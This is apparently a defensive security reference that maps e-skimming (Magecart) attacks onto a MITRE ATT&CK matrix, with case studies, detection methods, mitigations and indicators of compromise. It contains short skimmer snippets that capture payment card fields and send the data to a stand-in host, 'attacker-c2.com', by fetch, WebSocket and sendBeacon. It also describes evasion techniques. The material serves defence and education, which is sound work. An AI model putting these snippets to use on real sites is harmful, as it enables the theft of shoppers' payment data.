MITRE ATT&CK Matrix - E-Skimming Attacks

Understanding E-Skimming Attack Patterns

E-skimming attacks have caused billions in damages and affected millions of customers worldwide. This framework provides comprehensive analysis of attack techniques, tactics, and procedures used by threat actors to compromise e-commerce platforms.

Initial Access

Execution

Persistence

Defense Evasion

Collection

Exfiltration

Impact

380K

British Airways Victims

£20M

ICO Fine (British Airways)

11K+

Sites Compromised (CosmicSting)

13+

Magecart Groups Active

📊

Overview

Document Information
Version 2.0 | Last Updated: 2025-10-21
Target Environment: Web applications, e-commerce platforms, payment processing systems
Updates: Added 33 new techniques including GTM hijacking, NPM supply chain attacks, steganography, and annotation system

This document presents a customized MITRE ATT&CK matrix specifically designed for e-skimming (web skimming, formjacking, Magecart) attacks. Based on extensive research and analysis of real-world e-skimming campaigns, this matrix maps attack techniques, tactics, and procedures (TTPs) used by threat actors to compromise e-commerce platforms and steal payment card data.

🎯

MITRE ATT&CK Matrix for E-Skimming

Annotation System: Techniques are marked with status badges to indicate their prevalence:
🔴 Observed = Documented in real-world attacks with published IOCs or incident reports
🟡 Emerging = Security research, PoCs, or logical evolution of existing techniques
🔵 Lab-Only = Demonstrated in controlled lab environments for educational purposes

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
4 techniques	1 technique	4 techniques	3 techniques	9 techniques	4 techniques	6 techniques	0 techniques	5 techniques	1 technique	4 techniques	5 techniques
T1190 🔴 Observed Exploit Public-Facing Application T1078 🔴 Observed Valid Accounts T1195 🔴 Observed Supply Chain Compromise T1195.002 🔴 Observed Compromise Software Dependencies (NPM Sept 2025) CUSTOM 🔴 Observed Google Tag Manager Hijacking	T1059.007 JavaScript Execution	T1554 🔴 Observed Compromise Client Software T1176 🔴 Observed Browser Extensions CUSTOM 🔴 Observed GTM Container Poisoning CUSTOM 🟡 Emerging Service Worker Man-in-the-Middle	T1068 🔴 Observed Exploitation for Privilege Escalation T1548.002 🔴 Observed Bypass UAC / Weak Admin Auth CUSTOM 🟡 Emerging Web App Role Escalation	T1027 🔴 Observed Obfuscated Files or Information T1027.003 🔴 Observed Steganography (CSS, EXIF, PNG, Favicon) T1622 🔴 Observed Debugger Evasion T1480 🔴 Observed Execution Guardrails T1480.001 🔴 Observed Geofencing T1036 🔴 Observed Masquerading T1497.001 🔴 Observed VM/Sandbox Evasion (WebGL) CUSTOM 🔴 Observed Canvas Fingerprinting Evasion CUSTOM 🔴 Observed CSP Bypass via Google Analytics CUSTOM 🟡 Emerging Timing-Based Evasion CUSTOM 🟡 Emerging Shadow DOM Hiding	T1003 🔴 Observed OS Credential Dumping T1552.001 🔴 Observed Unsecured Credentials (.env files) T1555.003 🔴 Observed Browser Saved Credentials CUSTOM 🟡 Emerging Credential Management API Hooking	T1083 🔴 Observed File and Directory Discovery T1082 🔴 Observed System Info Discovery (Fingerprinting) T1614 🔴 Observed System Location Discovery (Geolocation) T1010 🔴 Observed Application Window Discovery (DevTools) CUSTOM 🔴 Observed Payment Form Discovery T1497 🔴 Observed Virtualization/Sandbox Evasion	No techniques commonly used in e-skimming attacks	T1056 🔴 Observed Input Capture T1056.001 🔴 Observed Keylogging T1056.002 🔴 Observed GUI Input Capture T1005 🔴 Observed Data from Local System CUSTOM 🔴 Observed DOM Manipulation (MutationObserver) CUSTOM 🔴 Observed Payment Request API Manipulation CUSTOM 🔴 Observed LocalStorage Scraping	T1071 🔴 Observed Web Service	T1041 🔴 Observed Exfiltration Over C2 Channel CUSTOM 🔴 Observed WebSocket Exfiltration CUSTOM 🔴 Observed Image-Based Exfiltration CUSTOM 🟡 Emerging DNS Tunneling	T1491.001 🔴 Observed Internal Defacement (Fake Forms) T1496 🔴 Observed Resource Hijacking (Cryptojacking) T1657 🔴 Observed Financial Theft T1565.002 🟡 Emerging Transmitted Data Manipulation T1499 🟡 Emerging Endpoint Denial of Service

🎯

MITRE ATT&CK Tactics and Techniques

TA0001: Initial Access

The techniques used by attackers to gain initial entry into the target e-commerce infrastructure.

T1190

Exploit Public-Facing Application

Exploitation of vulnerabilities in e-commerce platforms to gain access.

Key Example: CVE-2024-34102 (CosmicSting) - XXE vulnerability in Adobe Commerce/Magento 2.4.7 with CVSS 9.8/10

Impact: 3x increase in Magecart infections (11,000+ domains in 2024)

Detection: WAF logs, unusual HTTP requests, XXE entity expansion

T1078

Valid Accounts (Stolen Credentials)

Use of stolen or compromised credentials to access e-commerce admin panels.

Examples: British Airways (2018), Newegg (2018)

Method: Phishing, info-stealer malware, credential stuffing

Detection: Unusual login times/locations, VPN usage, off-hours access

T1195

Supply Chain Compromise

Manipulation of third-party services, libraries, or dependencies to inject malicious code.

Examples: Ticketmaster (Inbenta chatbot - 40K victims), Forbes (fontsawesome.gq)

Targets: CDN providers, analytics services, chat widgets, browser extensions

Detection: SRI hash mismatches, CSP violations, unexpected script changes

CUSTOM 🔴 Observed

Google Tag Manager Hijacking

Compromising GTM containers to inject persistent skimmers that bypass traditional security controls.

2025 Campaign: 316 stores compromised, 88,000 victims, average 3.5 months persistence

Method: Phishing GTM admin credentials → Inject Base64-encoded skimmer in GTM container → Persistent across pages

Evasion: Security tools whitelist GTM, skip container scanning. Backdoor in media/index.php for re-infection

Detection: GTM container audits, Base64 in GTM tags, network requests from GTM to non-Google domains

T1195.002 🔴 Observed

NPM Supply Chain Attack (September 2025)

Sophisticated attack on NPM ecosystem affecting 2 billion weekly downloads.

Attack Vector: Phishing + MITM 2FA theft of Josh Junon (Qix) account

Compromised: 20 packages: chalk, debug, ansi-styles, supports-color, strip-ansi + 15 more

Payload: Crypto wallet hijacking (ETH, BTC, SOL, TRX, LTC, BCH) targeting web contexts

Duration: 2.5 hours exposure (September 8, 2025)

Detection: Package.json monitoring, SRI for npm packages, post-install script auditing

T1027.003 🔴 Observed

Steganography Techniques

Hiding malicious code in image metadata, CSS files, and favicons to bypass detection.

CSS Steganography: Malicious code hidden in CSS file comments, extracted via obfuscated JS

EXIF Metadata: Skimmer in JPEG "Copyright" field (Segway 2022: 600K visitors affected)

PNG LSB: Code hidden in PNG least significant bits, alpha channel

Favicon Alpha: 512 bytes in 64x64 ICO transparency layer (2024 academic research)

Detection: EXIF metadata scanning (ExifTool), CSS entropy analysis, statistical LSB detection

TA0002: Execution

Techniques used to run malicious code on the victim's browser or server.

T1059.007: JavaScript Execution

▼

Description: Execution of malicious JavaScript in the victim's browser. All e-skimming attacks execute JavaScript client-side.

Attack Patterns:

Form Submission Interception: addEventListener('submit', stealData)
DOM-Based Monitoring: MutationObserver API, Shadow DOM abuse
Extension-Based Execution: Content scripts across all websites

// Form interception example
document.addEventListener('submit', function(e) {
    var cardData = extractPaymentData();
    exfiltrateToC2(cardData);
});

// Real-time monitoring
document.addEventListener('input', function(e) {
    if (isPaymentField(e.target)) {
        captureKeystroke(e.target.value);
    }
});

Detection: Unexpected event listeners on payment forms, CSP violations, browser extension anomalies

TA0003: Persistence

Techniques to maintain access and continue operations over extended periods.

T1554

File Modification (Compromise Client Software)

Modification of legitimate JavaScript files to include skimmer code.

Example: British Airways - 22 lines appended to Modernizr library (15 days, 380K victims)

Duration: Average 47 days undetected, range 2 weeks to 6 months

Detection: File integrity monitoring (FIM), git diff alerts, code review

T1176

Browser Extensions

Use of malicious or compromised browser extensions for persistent access.

Examples: DataSpii, Great Suspender, crypto wallet extensions

Capabilities: Cross-site access, bypass same-origin policy, persistent across sessions

Detection: Excessive permissions, unexpected updates, network traffic from background scripts

TA0005: Defense Evasion

Techniques to avoid detection by security tools and analysts.

T1027

Obfuscated Files or Information

Code obfuscation to evade detection and analysis.

Techniques: Base64 encoding, multi-layer encoding, obfuscator.io, dead code injection

Examples: Kritec skimmer, Gateway skimmer (multiple layers)

Detection: High entropy, eval() with encoded args, static analysis tools

T1622

Debugger Evasion

Anti-debugging techniques to prevent security analysis.

Methods: Firebug detection, debugger statements, timing attacks, console override

Example: Gateway skimmer checks for Firebug/DevTools

T1480

Execution Guardrails (Geofencing)

Conditional execution based on environment to evade detection.

Techniques: Country filtering, VPN detection, browser fingerprinting, VM detection (WebGL)

Detection: Environment checks, geolocation API usage, WebGL renderer queries

T1036

Masquerading

Disguising malicious code as legitimate services or libraries.

Methods: GTM disguise, analytics domains, 404 page hiding, image steganography

Example: Segway (2022) - 600K+ records via image-hidden code

CUSTOM 🔴 Observed

CSP Bypass via Google Analytics

Exfiltrating stolen data through attacker-controlled Google Analytics accounts to bypass CSP restrictions.

Campaign: March 2024 Magecart campaign targeting several dozen e-commerce sites

Method: Encode stolen card data → Send to attacker's GA dashboard via legitimate GA endpoints

Bypass: CSP allows Google Analytics by default, attackers abuse whitelisted service

Detection: GA measurement ID validation, unexpected GA traffic patterns, data encoding in GA events

T1497.001 🔴 Observed

VM/Sandbox Evasion (WebGL Detection)

Detecting analysis environments via WebGL renderer queries to avoid security researchers.

Technique: Query WebGL renderer for "swiftshader", "llvmpipe", "virtualbox" signatures

Examples: Advanced Magecart variants, Gateway skimmer

Impact: Skimmer only executes on real victim browsers, skips analysis VMs

Detection: Monitor WebGL API calls, renderer string queries, environment fingerprinting

TA0009: Collection

Techniques to gather payment card data and personal information from victims.

T1056: Input Capture

▼

Description: Capturing user input from payment forms.

Sub-Techniques:

T1056.001 Keylogging: Real-time keystroke capture as user types
T1056.002 GUI Input Capture: Form submission interception, change event monitoring

Data Collected:

Payment card data (number, CVV, expiry, cardholder name)
Billing information (address, ZIP, phone, email)
Personal information (name, email, account credentials)
Session data (cookies, localStorage, sessionStorage)
Device fingerprint (browser, OS, screen resolution, timezone)

// Form submission interception
document.querySelector('form').addEventListener('submit', function(e) {
    var cardData = {
        number: document.querySelector('#card-number').value,
        cvv: document.querySelector('#cvv').value,
        expiry: document.querySelector('#expiry').value,
        billing: {/* ... */}
    };
    exfiltrate(cardData);
});

Detection: Unexpected event listeners on payment forms, input event handlers, localStorage writes with payment data

T1005

Data from Local System

Collection of data stored locally in browser storage.

Targets: localStorage, sessionStorage, cookies, IndexedDB

Example: Multi-form Magecart collecting data across multiple pages

TA0010: Exfiltration

Techniques to transmit stolen payment data to attacker-controlled infrastructure.

T1041: Exfiltration Over C2 Channel

▼

Description: Sending stolen data to command and control servers.

Exfiltration Methods:

HTTP POST (Most Common)

fetch('https://attacker-c2.com/collect', {
    method: 'POST',
    headers: {'Content-Type': 'application/json'},
    body: JSON.stringify(stolenData),
    mode: 'no-cors'
});

WebSocket

var ws = new WebSocket('wss://attacker-c2.com/ws');
ws.onopen = function() {
    ws.send(JSON.stringify(stolenData));
};

Beacon API

navigator.sendBeacon(
    'https://attacker-c2.com/beacon',
    JSON.stringify(stolenData)
);

C2 Domain Characteristics:

Lookalike domains: google-analytics.net, analytics-cdn.com
British Airways example: baways.com (lookalike domain)
Fast flux: Rapidly changing IP addresses
Bulletproof hosting: Resistant to takedown

Detection: Unexpected POST requests, WebSocket to unusual domains, Beacon API in payment context, requests to newly registered domains

🔍

Detection & Mitigation Matrix

Attack Stage	Detection Method	Tools	Indicators
Initial Access	Log monitoring, WAF	SIEM, WAF, Access Reviews	Unusual admin access, exploit attempts
Execution	CSP violations, script analysis	Browser DevTools, Semgrep, AI analysis	Unexpected scripts, CSP reports
Persistence	SDLC integrity checks, CDN/WAF injection monitoring	OSSEC, Tripwire	File modifications, unauthorized changes
Defense Evasion	Static analysis, deobfuscation, selective execution	de4js, JsDeObsBench, js-beautify, script analysis	High entropy, eval(), obfuscation, detection of analysis tools/environment
Collection	Runtime monitoring, event analysis	Custom scripts, extensions	Unexpected form access, input listeners, form overlay
Exfiltration	3rd party key/id monitor, CSP-report-only	CSP-report-only custom monitor, HAR change detection	New domains, especially typo-squatted ones

🛡️

Defense Strategies

Preventive

Content Security Policy (CSP)

Restrict script sources and block unauthorized scripts.

<meta http-equiv="Content-Security-Policy"
      content="default-src 'self';
               script-src 'self' https://trusted-cdn.com;
               connect-src 'self';
               report-uri /csp-report">

Mitigates: Unauthorized script execution, inline scripts

Preventive

Subresource Integrity (SRI)

Cryptographic hash verification for external scripts.

<script src="https://cdn.example.com/lib.js"
        integrity="sha384-oqVuAfXRKap7..."
        crossorigin="anonymous"></script>

Mitigates: CDN compromise, unauthorized script modifications

Preventive

Multi-Factor Authentication (MFA)

Prevent credential-based compromise of admin accounts.

Mitigates: Stolen credentials, phishing, credential stuffing

Required: All admin accounts, developer access, production systems

Detective

File Integrity Monitoring (FIM)

Detect unauthorized file modifications in real-time.

Tools: OSSEC, Tripwire, AIDE

Coverage: All production JavaScript, HTML, CSS files

Detective

Network Monitoring

Monitor all outbound traffic from checkout pages.

Tools: Suricata, Snort, Zeek

Alerts: Requests to unknown/suspicious domains

Detective

Behavioral Monitoring

Monitor form field access patterns and event listeners.

// Monitor unauthorized form access
Object.defineProperty(HTMLInputElement.prototype, 'value', {
    get: function() {
        if (isPaymentField(this) && !isAuthorized()) {
            console.trace('Unauthorized access!');
        }
        return originalGetter.call(this);
    }
});

📚

Real-World Case Studies

British Airways (August 2018)

Attack Chain: Initial Access (T1078) → Execution (T1059.007) → Persistence (T1554) → Collection (T1056.002) → Exfiltration (T1041)

Details: Stolen admin credentials (no MFA) → Modified Modernizr library → 22-line skimmer → Form submission interception → HTTP POST to baways.com

Impact: 380,000 victims | 15 days undetected | £20M ICO fine

Detection Failure: No FIM, no behavioral monitoring, discovered via customer fraud reports

Ticketmaster (June 2018)

Attack Chain: Supply Chain Compromise (T1195.002) → Execution (T1059.007) → Collection (T1056) → Exfiltration (T1041)

Details: Compromised Inbenta chatbot third-party service → Malicious code in chatbot script

Impact: 40,000 victims | £1.25M fine

Key Lesson: Third-party scripts require SRI and CSP controls

CosmicSting / CVE-2024-34102 (2024)

Attack Chain: Exploit Vulnerability (T1190) → Execution → Persistence

Details: XXE vulnerability in Adobe Commerce/Magento 2.4.7 (CVSS 9.8) → Remote code execution → Skimmer installation

Impact: 3x increase in Magecart infections | 11,000+ domains compromised

Detection: WAF rules for XXE, unusual XML requests, file system changes

Google Tag Manager Hijacking Campaign (2025)

Attack Chain: Stolen Credentials (T1078) → GTM Container Poisoning (CUSTOM) → Persistence → Defense Evasion (T1036) → Collection (T1056) → Exfiltration (T1041)

Details: Phishing GTM admin accounts → Inject Base64-encoded skimmer in GTM container (GTM-MLHK2N68) → Backdoor in media/index.php → 3.5 months average persistence

Impact: 316 stores compromised | 88,000 victims | Evasion via GTM whitelisting

Key Lesson: GTM containers require security audits, Base64 detection, and tag approval workflows

NPM Supply Chain Attack (September 2025)

Attack Chain: Supply Chain Compromise (T1195.002) → Credential Theft → Execution

Details: Phishing + MITM 2FA theft of Josh Junon (Qix) → Compromised 20 packages (chalk, debug, ansi-styles, etc.) → Crypto wallet hijacking payload

Impact: 2 billion weekly downloads affected | 2.5 hours exposure | Targets ETH, BTC, SOL, TRX, LTC, BCH wallets

Detection Failure: No runtime package verification, post-install scripts executed without review

⚠️

Indicators of Compromise (IOCs)

Network Indicators

Newly registered domains (< 30 days)
Bulletproof hosting providers
Typosquatting domains (baways.com, fontsawesome.gq)
POST requests from checkout to unknown domains
WebSocket connections to non-legitimate endpoints
Large URL parameters on image requests

Host Indicators

Modified JavaScript files outside deploy windows
Unexpected event listeners on payment forms
localStorage/sessionStorage with payment field names
Browser extensions with excessive permissions
File hash mismatches for production scripts

Code Indicators

eval(atob(...)) patterns
High-entropy variable names (_0x1a2b3c)
Payment field CSS selectors
Debugger detection code
Environment fingerprinting (WebGL queries)
Fetch/XHR to non-payment-processor domains

High-Risk Patterns to Monitor:
• querySelector('[name*="card"]') in unknown scripts
• document.cookie enumeration on checkout pages
• new WebSocket() on payment forms
• navigator.sendBeacon() with form data
• Multiple encoding layers (Base64 + hex + custom)

💡

Recommendations

For E-Commerce Platforms

Defense in Depth: CSP + SRI + FIM + Network Monitoring (no single control is sufficient)
Enforce MFA: All admin accounts require multi-factor authentication
Third-Party Risk: Vendor assessments, SRI for external scripts, regular audits
Continuous Monitoring: Real-time FIM alerts, network anomaly detection, checkout page monitoring
Incident Response: Documented procedures, regular drills, forensic readiness

For Security Teams

Threat Hunting: Regular code reviews, network traffic baselining, event listener inventory
Detection Engineering: Custom Semgrep rules, Suricata signatures, behavioral monitoring
Training: Developer secure coding, incident response drills, e-skimming TTP education